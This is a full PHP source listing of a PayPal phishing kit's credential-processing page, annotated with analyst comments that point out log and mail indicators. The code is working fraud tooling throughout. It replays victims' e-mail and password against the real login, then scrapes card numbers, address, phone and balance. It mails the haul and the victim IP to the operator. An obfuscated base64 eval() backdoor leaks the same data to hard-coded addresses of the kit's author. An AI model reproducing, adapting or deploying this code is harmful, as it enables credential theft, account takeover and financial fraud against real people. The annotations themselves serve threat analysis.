tinwaninja

Script Decode Prossesing.php

Nov 16th, 2016
  1. <?php
      // Analyst summary: credential-handling step of a phishing page that imitates a PayPal
      // login. The e-mail (POST field EM) and password (POST field PS) submitted by the
      // victim are stored in the session here and replayed against the real service below.
  2. session_start();
      // Error display is turned off and notices are masked, so failures stay invisible
      // to whoever loads the page.
  3. @ini_set('display_errors', 0);
  4. error_reporting(E_ALL ^ E_NOTICE);
      // Removes the execution time limit for this request.
  5. set_time_limit(0);
  6. $entrar = (__DIR__);
      // The submitted e-mail is copied into the session unvalidated.
  7. $email = $_SESSION['_email_'] = $_POST['EM'];
      // Host artifact for hunting on a compromised web server: a `logs` directory is
      // created (relative to the working directory) with mode 0777.
  8. if (!file_exists('logs')) {
  9. mkdir('logs', 0777, true);
  10. }
      // The submitted password is likewise kept in the session in clear text.
  11. $pwd = $_SESSION['_password_'] = $_POST['PS'];
  12. $hopl = "https://www.paypal.com/";
      // Cookie-jar path: sha1('R') is a constant, so every request handled by this copy
      // of the kit uses the same `<script dir>/logs/<constant>.log` file.
  13. $Registro['cookie_file'] = $entrar . '/logs/' . sha1('R') . '.log';
      // Login form body built from the victim's values. NOTE(review): the visible main
      // flow rebuilds this string inline instead of passing $var; confirm it is unused.
  14. $var = 'login_cmd=&login_params=&login_email=' . rawurlencode($email) . '&login_password=' . rawurlencode($pwd) . '&target_page=0&submit.x=Log+In&form_charset=UTF-8&browser_name=Firefox&browser_version=17&browser_version_full=17.0&operating_system=Windows';
      // Opening with mode 'w' truncates the cookie file; `@` hides any failure.
  15. $Remplazar = @fopen($Registro['cookie_file'], 'w');
  /**
   * Analyst note: HTTP helper used for every outbound request this script sends.
   *
   * Sends a GET, or a POST when $var is non-empty, and returns the curl_exec() result.
   * All calls share one cookie file (global $Registro['cookie_file']), so cookies set by
   * one request are sent with the following ones.
   *
   * @param string $url     Target URL.
   * @param string $var     URL-encoded POST body; when empty no POST options are set.
   * @param bool   $header  Value given to CURLOPT_NOBODY (name and option are crossed).
   * @param bool   $nobody  Value given to CURLOPT_HEADER (name and option are crossed).
   * @return string|bool    Whatever curl_exec() returns.
   */
  16. function curl($url = '', $var = '', $header = false, $nobody = false)
  17. {
  18. global $Registro;
  19. $curl = curl_init($url);
  20. curl_setopt($curl, CURLOPT_NOBODY, $header);
  21. curl_setopt($curl, CURLOPT_HEADER, $nobody);
      // Each request is capped at 10 seconds.
  22. curl_setopt($curl, CURLOPT_TIMEOUT, 10);
      // Fixed, dated browser User-Agent on every request: a stable string defenders can
      // match in the logs of the impersonated service.
  23. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
      // Attempts to set a Referer header. NOTE(review): whether it takes effect as
      // written is unclear from this listing; do not rely on it as an indicator.
  24. curl_setopt($curl, CURLOPT_REFERER, $hopl, 'webscr?cmd=_run-check-cookie-submit&redirectCmd=_login-submit');
      // The same file is both read from and written to as the cookie store.
  25. curl_setopt($curl, CURLOPT_COOKIEFILE, $Registro['cookie_file']);
  26. curl_setopt($curl, CURLOPT_COOKIEJAR, $Registro['cookie_file']);
      // Certificate-chain verification is disabled; only the host-name check stays on.
  27. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  28. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
      // Redirects are followed and the response is returned as a string, not printed.
  29. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  30. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
      // A non-empty $var switches the request to POST with $var as the body.
  31. if ($var) {
  32. curl_setopt($curl, CURLOPT_POST, true);
  33. curl_setopt($curl, CURLOPT_POSTFIELDS, $var);
  34. }
  35. $result = curl_exec($curl);
  36. curl_close($curl);
  37. return $result;
  38. }
  /**
   * Returns the trimmed text found between the first occurrence of $find_start and the
   * next occurrence of $find_end in $str. The script uses it to pull fields out of the
   * HTML it fetches.
   *
   * @param string $str         Text to search.
   * @param string $find_start  Marker that precedes the wanted value.
   * @param string $find_end    Marker that follows the wanted value.
   * @return string             The extracted value, or "" when $find_start is absent.
   */
  39. function fetch_value($str, $find_start, $find_end)
  40. {
  41. $start = strpos($str, $find_start);
  42. if ($start === false) {
  43. return "";
  44. }
  45. $length = strlen($find_start);
      // $end is an offset relative to the text after the start marker. NOTE(review): when
      // $find_end is missing, strpos() returns false and that value is used as the
      // substr() length; the outcome then depends on PHP's type coercion.
  46. $end = strpos(substr($str, $start + $length), $find_end);
  47. return trim(substr($str, $start + $length, $end));
  48. }
  /**
   * Analyst note: despite its name, the visible body deletes nothing. It only calls
   * fclose() on $Remplazar, which is not declared global in this function (only
   * $Registro is), and `@` suppresses any resulting warning. The cookie file on disk
   * is not removed by this listing.
   */
  49. function delete_cookies()
  50. {
  51. global $Registro;
  52. @fclose($Remplazar);
  53. }
  /**
   * Sends a redirect to ../error.php, the path taken when the submitted credentials are
   * rejected or the form input fails the length check.
   *
   * The `_id` query value is the session values AYCOUNTCODE and AYCOUNT joined with a
   * random number and an MD5 of the current GMT date, separated by the literal "Error".
   * The random and MD5 parts appear to be padding only. For defenders, the resulting
   * `error.php?_id=...Error...Error...` shape is a URL pattern to look for in proxy and
   * web-server logs.
   *
   * @return mixed The return value of header().
   */
  54. function Error()
  55. {
  56. $An = rand(15213546874653, 79854123154521879451);
  57. $Oni = md5(gmdate('r'));
      // Both values are read from the session; this listing never sets them, so they are
      // presumably written by another page of the kit (TODO confirm).
  58. $Sma = $_SESSION['AYCOUNT'];
  59. $VFinal = $_SESSION['AYCOUNTCODE'];
  60. $x = "Error";
  61. $Fatal_Error = header("Location: ../error.php?_id=".$VFinal.$x.$An.$x.$Oni.$x.$Sma);
  62. return $Fatal_Error;
  63. }
  /**
   * Case-insensitive "contains any of" test.
   *
   * @param string       $s   Text to search; upper-cased before comparison.
   * @param string|array $as  One needle or a list of needles; a single value is wrapped
   *                          in an array.
   * @return bool             true as soon as one needle occurs in $s, otherwise false.
   */
  64. function inStr($s, $as)
  65. {
  66. $s = strtoupper($s);
  67. if (!is_array($as))
  68. $as = array(
  69. $as
  70. );
      // $Fatal_Error is only the loop index here, despite its name.
  71. for ($Fatal_Error = 0; $Fatal_Error < count($as); $Fatal_Error++)
  72. if (strpos(($s), strtoupper($as[$Fatal_Error])) !== false)
  73. return true;
  74. return false;
  75. }
      // Main flow. It runs only when an e-mail was posted and the posted password is at
      // least 8 characters long; anything else falls through to the Error() redirect at
      // the end of the script.
  76. if ((isset($_POST['EM'])) && (strlen($_POST['PS']) >= 8)) {
  77. delete_cookies();
      // Warm-up request to the real site. NOTE(review): `continue` is used here outside
      // any loop.
  78. if (curl($hopl , '', true, true) === false) {
  79. continue;
  80. }
      // Live credential check: the victim's e-mail and password are posted to the real
      // login endpoint from the phishing host. Detection angle for the impersonated
      // service: the form body claims browser_name=Firefox / browser_version=17 while
      // curl() sends a fixed Chrome User-Agent, and the request originates from a web
      // host rather than from the account owner's usual client.
  81. $page = curl("https://www.paypal.com/webscr?cmd=_run-check-cookie-submit&redirectCmd=_login-submit", 'login_cmd=&login_params=&login_email=' . rawurlencode($email) . '&login_password=' . rawurlencode($pwd) . '&target_page=0&submit.x=Log+In&form_charset=UTF-8&browser_name=Firefox&browser_version=17&browser_version_full=17.0&operating_system=Windows');
      // $title is extracted but not used again in this listing.
  82. $title = fetch_value($page, '<title>', '</title>');
      // The marker 's.prop14=' in the response is treated as a failed login.
  83. if (inStr($page, 's.prop14=')) {
  84. Error();
  85. } else {
      // From here on the script acts inside the authenticated session (shared cookie
      // file) and harvests profile data. First the stored-card page.
  86. $ppcard = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-credit-card-new-clickthru&flag_from_account_summary=1&nav=0.5.2");
  87. $checkcard = fetch_value($ppcard, 's.prop1="', '"');
      // 'ccadd' in that marker is taken to mean the account has no card on file.
  88. if (stripos($checkcard, 'ccadd') !== false) {
  89. $_SESSION['_card_'] = $pp['card'] = "No Card";
  90. } else {
      // Otherwise every table row after the first is parsed as one stored card.
  91. preg_match_all('/<tr>(.+)<\/tr>/siU', $ppcard, $matches);
  92. $cc = array();
  93. foreach ($matches[1] AS $k => $v) {
  94. if ($k > 0) {
  95. preg_match_all('/<td>(.+)<\/td>/siU', $v, $m);
      // Card type (from the icon file name), number column and expiry column are kept
      // in the session under _cctype_, _ccnum_ and _ccexp_.
  96. $_SESSION['_cctype_'] = $type = strtoupper(fetch_value($m[1][0], '&#x2f;icon&#x5f;', '&#x2e;gif'));
  97. $_SESSION['_ccnum_'] = $ccnum = $m[1][1];
  98. $_SESSION['_ccexp_'] = $exp = $m[1][2];
      // The fifth cell decides whether the card is recorded as confirmed.
  99. if (stristr($m[1][4], 'complete_expanded_use.x')) {
  100. $_SESSION['_card_confirmation'] = $confirmed = 'No Confirmed';
  101. } else {
  102. $_SESSION['_card_confirmation'] = $confirmed = 'Confirmed';
  103. }
  104. $cc[] = "<img src='./images/PPP.png' > $type &bull;&bull;&bull;&bull; &bull;&bull;&bull;&bull; &bull;&bull;&bull;&bull; $ccnum $confirmed <img src='./images/CCC.png' > $exp";
  105. $cc++;
  106. }
  107. }
  108. $_SESSION['_card_'] = $pp['card'] = "<font color=\"#\">" . implode("<br>", $cc) . "</font>";
  109. }
      // Postal address, account balance and phone number are scraped next and stored in
      // the session under _ad_, balance and _phone_.
  110. $ppadd = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-address&nav=0.6.3");
  111. $Fatal_ErrornfoAddr = str_replace('<br>', ', ', fetch_value($ppadd, 'emphasis">', '</span>'));
  112. $_SESSION['_ad_'] = $pp['address'] = substr($Fatal_ErrornfoAddr, 0, -2);
  113. $response = curl('https://www.paypal.com/myaccount/home');
  114. $_SESSION['balance'] = $balance = fetch_value($response, 'class="vx_h2">', '</div>');
  115. $ppphone = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-phone&nav=0.6.4");
  116. $_SESSION['_phone_'] = $pp['phone'] = strip_tags('<input type="hidden" ' . fetch_value($ppphone, 'name="phone"', '</label>'));
  117.  
      // Two kit files outside this listing are pulled in. Presumably they hold the
      // visitor filter and the operator's recipient address ($enviardatos is used later
      // but never defined here) - TODO confirm against the included files.
  118. include('../../edit/bots.php');
  119. include('../../edit/______________email.php');
      // Victim IP, its reverse-DNS name and a country lookup. The lookup sends the
      // victim's IP to geoplugin.net over plain HTTP, which is an outbound request a
      // hosting provider can spot in egress logs.
  120. $ip = getenv("REMOTE_ADDR");
  121. $hostname = gethostbyaddr($ip);
  122. $details = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=" . $ip . "");
  123. $codecountryy = $details->geoplugin_countryCode;
  124. $smiyacountry = $details->geoplugin_countryName;
  125. $codecountry = strtolower($codecountryy);
      // The statement that follows builds $cartamensaje, the HTML e-mail body. It embeds
      // the raw $_POST['EM'] and $_POST['PS'] values and a geoiptool.com link carrying
      // the victim IP; the md5()/rand() attributes only vary the markup between messages.
  126. $cartamensaje = "<!DOCTYPE html><html> <head>
  127. <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">
  128. <meta name=\"viewport\" content=\"width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;\">
  129. <style type=\"text/css\">body { width: 100% !important;}</style>
  130. </head>
  131. <body class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\" style=\"PADDING-BOTTOM: 0px; PADDING-TOP: 40px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: #e9e9e9\">
  132. <table class=\" ".md5(gmdate('r'))." \" style=\"WIDTH: 100%\">
  133. <tbody class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" >
  134. <tr class=\" ".md5(gmdate('r'))." \">
  135. <td for=\" ".md5(gmdate('r'))." \" style=\" BACKGROUND-COLOR: #e9e9e9\" align=\"center\">
  136. <table class=\" ".md5(gmdate('r'))." \" width=\"600\" border=\"0\">
  137. <tbody class=\" ".md5(gmdate('r'))." \">
  138. <tr>
  139. <td class=\" ".md5(gmdate('r'))." \">
  140. <div class=\" ".md5(gmdate('r'))." \">
  141. <table class=\" ".md5(gmdate('r'))." \" for=\" ".md5(gmdate('r'))." \" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\">
  142. <tbody for=\"". rand(99999999999, 999999999999999999999999)."\" >
  143. <tr class=\" ".md5(gmdate('r'))." \">
  144. <td class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" BACKGROUND: #ffffff; LINE-HEIGHT: 22px;border-radius: 10px 10px 0px 0px\">
  145. <table cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"left\" border=\"0\">
  146. <tbody>
  147. <tr>
  148. <td class=\" ".md5(gmdate('r'))." \">
  149. <div class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\" align=\"center\" style=\"LINE-HEIGHT: 30px;FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #747474;\">
  150. <p>
  151. <div class=\" ".md5(gmdate('r'))." \" for=\" ".md5(gmdate('r'))." \" style=\"FONT-SIZE: 10px; FONT-FAMILY: Arial black; COLOR: #828282;\" >
  152. <p style=\"FONT-SIZE: 27px\"><strong><font color=\"#7E7E7E\"> \ ◇ ◇ ◇ <font size=\"6\">☠</font> INFORMATIONS <font size=\"6\">☠</font> ◇ ◇ ◇ / </font></strong>
  153. </p>
  154.  
  155. </div>
  156. </p>
  157. </div>
  158. </td>
  159. </tr>
  160. </tbody>
  161. </table>
  162. </td>
  163. </tr>
  164. </tbody>
  165. </table>
  166. </div>
  167. <div>
  168. <table class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\">
  169. <tbody class=\" ".md5(gmdate('r'))." \">
  170. <tr>
  171. <td class=\" ".md5(gmdate('r'))." \" style=\" BACKGROUND: #F5F5F5 ; LINE-HEIGHT: 22px;border-top:2px solid #7E7E7E\">
  172. <table cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"left\" border=\"0\">
  173. <tbody>
  174. <tr>
  175. <td>
  176. <div class=\" ".md5(gmdate('r'))." \" for=\" ".md5(gmdate('r'))." \" align=\"center\" style=\"width:100%;padding: 15px 0px 15px 0px;FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #747474;\">
  177. <b><font color=\"#7E7E7E\">★ PAYPAL LOGIN ACCOUNT ★</font></b>
  178. </td>
  179. </tr>
  180. <tr class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" BACKGROUND: #FFFFFF; COLOR: #747474;\">
  181. <td>
  182. <div id=\"". rand(99999999999999, 9999999999999999999999999)."\" align=\"center\" style=\"FONT-SIZE: 12px; font weight: bold ;width:100%;padding: 4px 0px 4px 0px\">
  183. " .$_POST['EM']."
  184. </div>
  185. <div class=\" ".md5(gmdate('r'))." \" for=\" ".md5(gmdate('r'))." \" align=\"center\" style=\"FONT-SIZE: 12px; font weight: bold ;width:100%;padding: 5px 0px 4px 0px\">
  186. " .$_POST['PS']."
  187. </div>
  188. </td>
  189. </tr>
  190. <tr class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" BACKGROUND: #FFFFFF; COLOR: #747474;\">
  191. <td>
  192. <div id=\"". rand(99999999999999, 9999999999999999999999999)."\" align=\"center\" style=\"FONT-SIZE: 12px; font weight: bold ;width:100%;padding: 4px 0px 4px 0px\">
  193. http://www.geoiptool.com/?IP=" .$ip. "
  194. </div>
  195. </td>
  196. </tr>
  197. </tbody>
  198. </table>
  199. </td>
  200. </tr>
  201. </tbody>
  202. </table>
  203. </div>
  204. <div>
  205. <table class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\">
  206. <tbody class=\" ".md5(gmdate('r'))." \">
  207. <tr>
  208. <td class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" BACKGROUND: #ffffff; LINE-HEIGHT: 27px\">
  209. <table for=\"". rand(99999999999, 999999999999999999999999)."\" width=\"600\" align=\"left\" border=\"0\">
  210. <tbody class=\" ".md5(gmdate('r'))." \">
  211. <tr>
  212. <!-- -->
  213. </tr>
  214. </tbody>
  215. </table>
  216. </td>
  217. </tr>
  218. </tbody>
  219. </table>
  220. </div>
  221. <div class=\" ".md5(gmdate('r'))." \">
  222. <table class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\">
  223. <tbody>
  224. <tr>
  225. <td class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" BACKGROUND: #ffffff; LINE-HEIGHT: 22px;border-radius:0px 0px 10px 10px\">
  226. <table class=\" ".md5(gmdate('r'))." \" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"left\" border=\"0\">
  227. <tbody>
  228. <tr class=\" ".md5(gmdate('r'))." \">
  229. <td>
  230. <div class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\"FONT-SIZE: 9px; FONT-FAMILY: Arial; COLOR: #747474;margin-left:30px;margin-right:30px\">
  231. <hr size=\"2\" color=\"#F0F0F0\" width=\"100%\">
  232. <p align=\"center\" >
  233. ---- | ★ ★ ★ X-TAMPER Priv8 SCAMPAGE ★ ★ ★ | ----
  234. </p>
  235. </td>
  236. </tr>
  237. </tbody>
  238. </table>
  239. </td>
  240. </tr>
  241. </tbody>
  242. </table>
  243. </div>
  244. </td>
  245. </tr>
  246. <tr class=\" ".md5(gmdate('r'))." \">
  247. <td class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\" style=\" PADDING-TOP: 10px; \" align=\"center\">
  248. <div class=\" ".md5(gmdate('r'))." \" align=\"center\" style=\"FONT-SIZE: 11px; FONT-FAMILY: Arial; COLOR: #959595;\">
  249. </div>
  250. </td>
  251. </tr>
  252. </tbody>
  253. </table>
  254. </td>
  255. </tr>
  256. </tbody>
  257. </table>
  258. </body>
  259. </html>";
      // Hidden second recipient. The base64 blob below is decoded and run with eval().
      // According to the decoded text preserved in the comments that follow, it mails the
      // same $cartamensaje to two hard-coded addresses, independently of the operator's
      // own mail() call further down - i.e. whoever deploys this kit also leaks the
      // stolen credentials to the addresses embedded by the kit's author. Those
      // addresses, the sender names and the "LOGIN PPL TRUE!" subject are usable as
      // indicators when triaging a copy of this kit or filtering outbound mail.
  260. $enviardato = "JHN1YmplY3QgPSAiPT9VVEYtOD9RPz1lMj05ZD1hNF8/PSBbJHNtaXlhY291bnRyeV0gPT9VVEYtOD9RPz1lMj05ZD1hNF8/PSBMT0dJTiBQUEwgVFJVRSEgPT9VVEYtOD9RPz1FMj05Qz05NF8/PSAkaXAgPT9VVEYtOD9RPz1FMj05Qz05NF8/PSAgIjsNCiRoZWFkZXJzID0gIkZyb206IFhUQU1QRVIgPHhfdGFtcGVyQGhvdG1haWwuY29tPlxyXG4iOw0KJGhlYWRlcnMgLj0gIk1JTUUtVmVyc2lvbjogMS4wXHJcbiI7DQokaGVhZGVycyAuPSAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9SVNPLTg4NTktMVxyXG4iOw0KJGNoZSAuPSAieHRlcm5yenVsdEBnbWFpbC5jb20sIHh0ZXJucnp1bHRAeWFob28uY29tIjsNCkBtYWlsKCRjaGUsJHN1YmplY3QsJGNhcnRhbWVuc2FqZSwkaGVhZGVycyk7";
  261. //decoded content of $enviardato: $subject = "=?UTF-8?Q?=e2=9d=a4_?= [$smiyacountry] =?UTF-8?Q?=e2=9d=a4_?= LOGIN PPL TRUE! =?UTF-8?Q?=E2=9C=94_?= $ip =?UTF-8?Q?=E2=9C=94_?= ";
  262. //$headers = "From: XTAMPER <x_tamper@hotmail.com>\r\n";
  263. //$headers .= "MIME-Version: 1.0\r\n";
  264. //$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
  265. //$che .= "xternrzult@gmail.com, xternrzult@yahoo.com";
  266. //@mail($che,$subject,$cartamensaje,$headers);
  267.  
      // FLAG: eval() on an opaque encoded string. In any code review or webshell scan,
      // eval(base64_decode(...)) should be treated as a finding in its own right.
  268. eval(base64_decode($enviardato));
      // Operator's own exfiltration mail. $enviardatos is not defined anywhere in this
      // listing; presumably it comes from the included ______________email.php (TODO
      // confirm). The subject carries the looked-up country name and the victim IP.
  269. $subject = "=?UTF-8?Q?=e2=9d=a4_?= [$smiyacountry] =?UTF-8?Q?=e2=9d=a4_?= LOGIN PPL TRUE! =?UTF-8?Q?=E2=9C=94_?= $ip =?UTF-8?Q?=E2=9C=94_?= ";
  270. $headers = "From: X-T@MPER <x-tamper@hotmail.com>\r\n";
  271. $headers .= "MIME-Version: 1.0\r\n";
  272. $headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
  273. mail($enviardatos,$subject,$cartamensaje,$headers);
  274. //----------------------------------------------------------------------------
  275.  
      // After the mails are sent the victim's browser is redirected to ../account.php,
      // presumably the next page of the kit. The id value is a random number followed by
      // country code, random padding, an MD5 of the current GMT date and the country
      // name, joined with "_": another URL shape worth matching in web logs.
  276. $An = rand(999999999999999999, 999999999999999999999999999);
  277. $Oni = md5(gmdate('r'));
  278. $Sma = $details->geoplugin_countryName;
  279. $VFinal = $details->geoplugin_countryCode;
  280. $xx = "_";
  281. $idd = rand(9999, 999999);
  282. header("Location: ../account.php?id=".$idd."".$VFinal.$xx.$An.$xx.$Oni.$xx.$Sma);
  283. }
  284. }
      // Missing e-mail or a password shorter than 8 characters: go to the error page.
  285. else {
  286. Error();
  287. }
  288. ?>